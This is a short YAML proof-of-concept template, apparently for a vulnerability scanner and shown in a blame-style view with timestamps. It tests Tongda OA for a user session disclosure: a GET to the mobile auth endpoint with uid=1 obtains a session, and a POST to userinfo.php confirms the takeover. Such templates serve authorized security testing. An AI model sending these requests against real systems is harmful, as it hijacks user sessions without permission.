2021-05-05 20:37:29 -07:00
|
|
|
name: poc-yaml-tongda-user-session-disclosure
|
|
|
|
rules:
|
|
|
|
- method: GET
|
|
|
|
path: /mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
|
|
|
|
follow_redirects: false
|
|
|
|
expression: "true"
|
|
|
|
|
|
|
|
- method: POST
|
|
|
|
path: /general/userinfo.php?UID=1
|
|
|
|
follow_redirects: false
|
|
|
|
expression: |
|
|
|
|
response.status == 200 && response.body.bcontains(b"\"dept_name\":\"") && response.body.bcontains(b"\"online_flag\":") && response.headers["Content-Type"].contains("application/json")
|
2021-11-15 19:53:46 -08:00
|
|
|
|
2021-05-05 20:37:29 -07:00
|
|
|
detail:
|
|
|
|
author: kzaopa(https://github.com/kzaopa)
|
|
|
|
links:
|
|
|
|
- https://mp.weixin.qq.com/s/llyGEBRo0t-C7xOLMDYfFQ
|